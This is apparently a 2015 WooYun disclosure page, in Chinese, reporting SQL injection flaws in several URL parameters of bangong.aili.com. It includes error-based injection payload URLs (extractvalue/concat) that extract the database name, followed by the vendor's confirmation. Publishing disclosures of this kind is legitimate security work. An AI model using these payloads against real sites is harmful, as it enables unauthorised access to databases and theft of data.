当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137971

漏洞标题:爱丽网几枚注入

相关厂商:aili.com

漏洞作者: Hancock

提交时间:2015-09-01 12:38

修复时间:2015-10-16 12:44

公开时间:2015-10-16 12:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-01: 细节已通知厂商并且等待厂商处理中
2015-09-01: 厂商已经确认,细节仅向厂商公开
2015-09-11: 细节向核心白帽子及相关领域专家公开
2015-09-21: 细节向普通白帽子公开
2015-10-01: 细节向实习白帽子公开
2015-10-16: 细节向公众公开

简要描述:

爱丽网几枚注入

详细说明:

需要先登录

http://bangong.aili.com/main.php?m=ailicms&m=message&s=admin_message_sed&uid=1(射这里)
http://bangong.aili.com/?m=report&s=complain&oid=201508300225441909&id=7644(射这里)&sid=1
http://bangong.aili.com/main.php?m=sns&s=admin_share_shop&act=search&key=(射这里)
http://bangong.aili.com/?m=product&s=cart&add_cart=1&price=1&nums=1&id=6972(射这里)&sid=112112(射这里)&sku=07100000701


有webscan,小菜只能列个数据库名和用户名出来了

database:
1.
http://bangong.aili.com/main.php?m=ailicms&m=message&s=admin_message_sed&uid=1' and extractvalue(1,concat(0x7c,(mid((ifnull(cast(database() as char),0x20)),1,50)),0x7c)) and 'b' like 'b
2.
http://bangong.aili.com/main.php?m=ailicms&m=message&s=admin_message_sed&uid=1' and extractvalue(1,concat(0x7c,(mid((ifnull(cast(database() as char),0x20)),1,50)),0x7c)) and 'b' like 'b
3.
http://bangong.aili.com/main.php?m=sns&s=admin_share_shop&act=search&key=' and extractvalue(1,concat(0x7c,(mid((ifnull(cast(database() as char),0x20)),1,50)),0x7c)) and 'b' like 'b
4.
http://bangong.aili.com/?m=product&s=cart&add_cart=1&price=1&nums=1&id=6972&sid=112112 and extractvalue(1,concat(0x7c,(mid((ifnull(cast(database() as char),0x20)),1,50)),0x7c)) and 'b' like 'b'&sku=07100000701


漏洞证明:

0.png


1.png

修复方案:

只是手工找了几个注入 其他应该还有 爱丽姐自己扫扫吧。

版权声明:转载请注明来源 Hancock@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-01 12:43

厂商回复:

抓紧时间联系技术中……

最新状态:

暂无